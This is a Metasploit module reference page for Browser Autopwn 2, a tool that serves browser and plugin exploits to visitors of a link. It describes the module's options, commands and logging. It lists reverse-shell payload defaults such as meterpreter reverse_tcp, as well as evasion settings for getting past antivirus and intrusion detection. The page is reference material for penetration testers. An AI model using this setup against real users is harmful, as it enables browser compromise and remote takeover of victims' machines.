HTTP Client Automatic Exploiter 2 (Browser Autopwn) - Metasploit


This page contains detailed information about how to use the auxiliary/server/browser_autopwn2 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
Module: auxiliary/server/browser_autopwn2
Source code: modules/auxiliary/server/browser_autopwn2.rb
Disclosure date: 2015-07-05
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will automatically serve browser exploits. Here are the options you can configure: The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example, if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'. The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash exploits, you can set this. Also note that the Exclude option will always be evaluated after the Include option. The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn. By default, 20 will be loaded. But note that the client will probably not be vulnerable to all 20 of them, so only some will actually be served to the client. The HTMLContent option allows you to provide a basic webpage. This is what the user behind the vulnerable browser will see. You can simply set a string, or you can do the file:// syntax to load an HTML file. Note this option might break exploits so try to keep it as simple as possible. The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to get. The default -1 means unlimited. Combining this with other options such as RealList and Custom404, you can get information about which visitors (IPs) clicked on your malicious link, what exploits they might be vulnerable to, redirect them to your own internal training website without actually attacking them. For more information about Browser Autopwn, please see the referenced blog post.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > exploit

Knowledge Base

Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and feel different for you. Here are the features you should know about before using.

Vulnerable Application

Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:

  • Internet Explorer
  • Mozilla Firefox
  • Adobe Flash
  • Java
  • ActiveX
  • Silverlight

Exploit URLs

Normally, the only URL you need to care about is the BrowserAutoPwn URL. This is the URL you should send to the targets you wish to attack.

For debugging purposes, you can also see each browser exploit's specific URL path. You can do so by setting the VERBOSE option to true in msfconsole, like this:

set VERBOSE true

And then when you run the module, there will be a list showing all the exploits that might be used, including the URLs.

Browser Autopwn 2 Options

The HTMLContent Option

The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a blank one. It supports two syntaxes.

This example will basically print "Hello world!" on the browser while exploits are tested against it.

set HTMLContent Hello world!

This example will load file /tmp/hello_world.html and that's what the browser will see. Most likely the second syntax is how you'd want to use the Content option.

Keep in mind that you should probably try to keep HTMLContent as simple as possible, otherwise there is a possibility that it might actually influence the reliability of the exploits, especially the ones that do memory corruption.

The EXCLUDE_PATTERN option

The EXCLUDE_PATTERN option is used for excluding exploit file names you don't want Browser Autopwn 2 to use. This is a regex type option, you can be creative about this.

For example, Adobe Flash exploits in Metasploit tend to have the same file name that begins with: "adobe_flash_", so to exclude those, you can do:

set EXCLUDE_PATTERN adobe_flash

The INCLUDE_PATTERN option

The INCLUDE_PATTERN option is for loading specific exploits that you want Browser Autopwn 2 to use. Let's reuse the Adobe Flash file name example, if you only want Flash exploits, you can do:

set INCLUDE_PATTERN adobe_flash

If you set both INCLUDE_PATTERN and EXCLUDE_PATTERN, the evaluation for INCLUDE_PATTERN will kick in first, followed by EXCLUDE_PATTERN.

The MaxExploitCount option

The MaxExploitCount option is for specifying how many exploits you want Browser Autopwn 2 to load. By default, it's 21. But you can try to bump it up a little bit if you wish to try more exploits. Note that by doing so you are also allowing more lower ranking modules to kick in, you will have to figure out the sweet spot for it. An example of setting it:

set MaxExploitCount 30

The MaxSessionCount option

The MaxSessionCount option is for limiting how many sessions to get. It may sound a little odd at first because why would you want to do that, right? Well, a use case for this is when you don't actually want to pop shells, instead you just want to know what exploits could be used, this is something you can try. You can also use this if you don't want your attack to stay open the whole time:

set MaxSessionCount 10

The ShowExploitList option

The ShowExploitList option means displaying a list of exploits specific to each browser/client. As we've explained before, when BAP2 loads 21 exploits, probably not all 21 will be served to the browser, only some of them. In order to see those ones, you need to set this option:

set ShowExploitList true

The AllowedAddresses option

The AllowedAddresses option is for attacking a specific range of IPs as a way to avoid penetration testing accidents. For example, when you send a malicious link to a specific person, that person may actually share it with his friends, family or other people, and those people aren't your targets so you shouldn't hit them. Well, Browser Autopwn doesn't know that, so one of the ways to avoid that is to create a whitelist.

The option also supports two syntaxes. This is most likely how you will set it:

set AllowedAddresses file:///tmp/ip_list.txt

The above will load file ip_list.txt. In that file, one IP per line.

The ExploitReloadTimeout option

The ExploitReloadTimeout is for setting how long BAP2 should wait before loading the next exploit. By default, it's 3 seconds, but in case some exploits need more time (for example, longer time to groom the heap, load other things, or it's doing a sleep somewhere), you will need to set this. In most cases, you shouldn't have to.

Here's an example of setting it to 5 seconds:

set ExploitReloadTimeout 5000

Scenarios

By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to test a specific application, basically all you need to do is setting the INCLUDE_PATTERN option (or maybe EXCLUDE_PATTERN).

However, there is another trick to make this task even easier. BAP2 also comes with the following resource scripts that can automatically do this:

  • bap_firefox_only.rc - For testing Firefox
  • bap_flash_only.rc - Fore testing Adobe Flash
  • bap_ie_only.rc - For testing Internet Explorer
  • bap_dryrun_only.rc - Rickrolls the target, and shows you all the suitable exploits against that target. No exploits will actually be fired.

Here's an example of using bap_flash_only.rc to test Adobe Flash vulnerabilities:

$ ./msfconsole -q -r scripts/resource/bap_flash_only.rc

Logging

In addition, when a browser connects to BAP, this link-clicking event is also logged to the database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also save the exploit list information so that after testing you can go back to the database and see which users are vulnerable to what exploits.

Even if you don't set the ShowExploitList option, the logged link-clicking event data is more than enough to prove that the user was social-engineered, which is still a security risk.

To see all the bap.clicks events, in msfconsole do:

notes -t bap.clicks

From there, you can do additional analysis of these notes, put it on your report, and hopefully do something about it.

Go back to menu.

Msfconsole Usage

Here is how the server/browser_autopwn2 auxiliary module looks in the msfconsole:

msf6 > use auxiliary/server/browser_autopwn2

msf6 auxiliary(server/browser_autopwn2) > show info

       Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
     Module: auxiliary/server/browser_autopwn2
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-07-05

Provided by:
  sinn3r <[email protected]>

Available actions:
  Name       Description
  ----       -----------
  WebServer  Start a bunch of modules and direct clients to appropriate exploits

Check supported:
  No

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
  INCLUDE_PATTERN                   no        Pattern search to include specific modules
  Retries          true             no        Allow the browser to retry the module
  SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT          8080             yes       The local port to listen on.
  SSL              false            no        Negotiate SSL for incoming connections
  SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                           no        The URI to use for this exploit (default is random)

Description:
  This module will automatically serve browser exploits. Here are the 
  options you can configure: The INCLUDE_PATTERN option allows you to 
  specify the kind of exploits to be loaded. For example, if you wish 
  to load just Adobe Flash exploits, then you can set Include to 
  'adobe_flash'. The EXCLUDE_PATTERN option will ignore exploits. For 
  example, if you don't want any Adobe Flash exploits, you can set 
  this. Also note that the Exclude option will always be evaluated 
  after the Include option. The MaxExploitCount option specifies the 
  max number of exploits to load by Browser Autopwn. By default, 20 
  will be loaded. But note that the client will probably not be 
  vulnerable to all 20 of them, so only some will actually be served 
  to the client. The HTMLContent option allows you to provide a basic 
  webpage. This is what the user behind the vulnerable browser will 
  see. You can simply set a string, or you can do the file:// syntax 
  to load an HTML file. Note this option might break exploits so try 
  to keep it as simple as possible. The MaxSessionCount option is used 
  to limit how many sessions Browser Autopwn is allowed to get. The 
  default -1 means unlimited. Combining this with other options such 
  as RealList and Custom404, you can get information about which 
  visitors (IPs) clicked on your malicious link, what exploits they 
  might be vulnerable to, redirect them to your own internal training 
  website without actually attacking them. For more information about 
  Browser Autopwn, please see the referenced blog post.

References:
  https://blog.rapid7.com/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2

Module Options

This is a complete list of options available in the server/browser_autopwn2 auxiliary module:

msf6 auxiliary(server/browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

Advanced Options

Here is a complete list of advanced options supported by the server/browser_autopwn2 auxiliary module:

msf6 auxiliary(server/browser_autopwn2) > show advanced

Module advanced options (auxiliary/server/browser_autopwn2):

   Name                   Current Setting                    Required  Description
   ----                   ---------------                    --------  -----------
   AllowedAddresses                                          no        A range of IPs you're interested in attacking
   CookieExpiration                                          no        Cookie expiration in years (blank=expire on exit)
   CookieName             __ua                               no        The name of the tracking cookie
   Custom404                                                 no        An external custom 404 URL (Example: http://example.com/404.html)
   ExploitReloadTimeout   3000                               no        Number of milliseconds before trying the next exploit
   HTMLContent                                               no        HTML Content
   JsIdentifiers                                             no        Identifiers to preserve for JsObfu
   JsObfuscate            0                                  no        Number of times to obfuscate JavaScript
   LHOST                  192.168.204.3                      yes       The local host for the exploits and handlers
   ListenerComm                                              no        The specific communication channel to use for this service
   MaxExploitCount        21                                 no        Number of browser exploits to load
   MaxSessionCount        -1                                 no        Number of sessions to get
   PAYLOAD_ANDROID        android/meterpreter/reverse_tcp    yes       Payload for android browser exploits
   PAYLOAD_ANDROID_LPORT  4443                               yes       Payload LPORT for android browser exploits
   PAYLOAD_FIREFOX        firefox/shell_reverse_tcp          yes       Payload for firefox browser exploits
   PAYLOAD_FIREFOX_LPORT  4442                               yes       Payload LPORT for firefox browser exploits
   PAYLOAD_GENERIC        generic/shell_reverse_tcp          yes       Payload for generic browser exploits
   PAYLOAD_GENERIC_LPORT  4459                               yes       Payload LPORT for generic browser exploits
   PAYLOAD_JAVA           java/meterpreter/reverse_tcp       yes       Payload for java browser exploits
   PAYLOAD_JAVA_LPORT     4448                               yes       Payload LPORT for java browser exploits
   PAYLOAD_LINUX          linux/x86/meterpreter/reverse_tcp  yes       Payload for linux browser exploits
   PAYLOAD_LINUX_LPORT    4445                               yes       Payload LPORT for linux browser exploits
   PAYLOAD_OSX            osx/x86/shell_reverse_tcp          yes       Payload for osx browser exploits
   PAYLOAD_OSX_LPORT      4447                               yes       Payload LPORT for osx browser exploits
   PAYLOAD_UNIX           cmd/unix/reverse                   yes       Payload for unix browser exploits
   PAYLOAD_UNIX_LPORT     4446                               yes       Payload LPORT for unix browser exploits
   PAYLOAD_WIN            windows/meterpreter/reverse_tcp    yes       Payload for win browser exploits
   PAYLOAD_WIN_LPORT      4444                               yes       Payload LPORT for win browser exploits
   SSLCipher                                                 no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression         false                              no        Enable SSL/TLS-level compression
   SendRobots             false                              no        Return a robots.txt file if asked for one
   ShowExploitList        false                              yes       Show which exploits will actually be served to each client
   URIHOST                                                   no        Host to use in URI (useful for tunnels)
   URIPORT                                                   no        Port to use in URI (useful for tunnels)
   VERBOSE                false                              no        Enable detailed status messages
   WORKSPACE                                                 no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the server/browser_autopwn2 module can do:

msf6 auxiliary(server/browser_autopwn2) > show actions

Auxiliary actions:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

Evasion Options

Here is the full list of possible evasion options supported by the server/browser_autopwn2 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(server/browser_autopwn2) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • sinn3r

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.